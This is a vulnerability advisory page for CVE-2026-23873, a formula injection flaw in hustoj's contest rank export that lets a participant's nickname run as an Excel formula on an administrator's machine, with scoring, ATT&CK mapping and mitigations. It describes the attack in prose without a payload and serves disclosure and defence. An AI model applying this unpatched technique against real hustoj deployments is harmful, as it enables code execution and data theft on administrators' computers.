CVE-2026-23873
Published: 22 January 2026
Summary
CVE-2026-23873 is a critical-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in Hustoj Hustoj. Its CVSS base score is 9.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Malicious File (T1204.002); ranked at the 7.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Requires filtering and sanitization of information output in exported .xls files to prevent embedding and execution of malicious Excel formulas from unsanitized nicknames.
Mandates validation of user-supplied inputs like the Nickname field to reject or neutralize formula injection payloads before storage or processing.
Enforces restrictions on input classes for fields like Nickname using allowlists to block dangerous characters that could form executable Excel formulas.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Formula injection into exported .xls enables admin to execute malicious content via opening file (T1204.002 Malicious File), leading to RCE on client workstation.
NVD Description
hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input…
more
(specifically the "Nickname" field) before exporting it to an .xls file (which renders as an HTML table but is opened by Excel). If a malicious user sets their nickname to an Excel formula when an administrator exports and opens the rank list in Microsoft Excel, the formula will be executed. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication.
Deeper analysisAI
CVE-2026-23873 is a CSV Injection (Formula Injection) vulnerability affecting all versions of hustoj, an open-source online judge platform based on PHP, C++, MySQL, and Linux, used for ACM/ICPC and NOIP training. The issue resides in the contest rank export functionality, specifically the contestrank.xls.php and admin/ranklist_export.php scripts. These components fail to sanitize user-supplied input from the "Nickname" field before incorporating it into an exported .xls file, which is rendered as an HTML table but opened by Microsoft Excel, allowing embedded formulas to execute.
A low-privileged user, such as a registered participant, can exploit this by setting their nickname to a malicious Excel formula. When an administrator exports the contest rank list and opens the file in Microsoft Excel, the formula executes with the administrator's privileges. This can result in arbitrary command execution (RCE) on the administrator's machine or data exfiltration, as indicated by the CVSS v3.1 score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) and associated CWE-1236.
The GitHub security advisory at https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw details the vulnerability but notes that no fix was available at the time of publication on 2026-01-22. Security practitioners should monitor for patches, restrict export access, sanitize nicknames server-side, or advise administrators against opening exports in Excel until remediation.
Details
- CWE(s)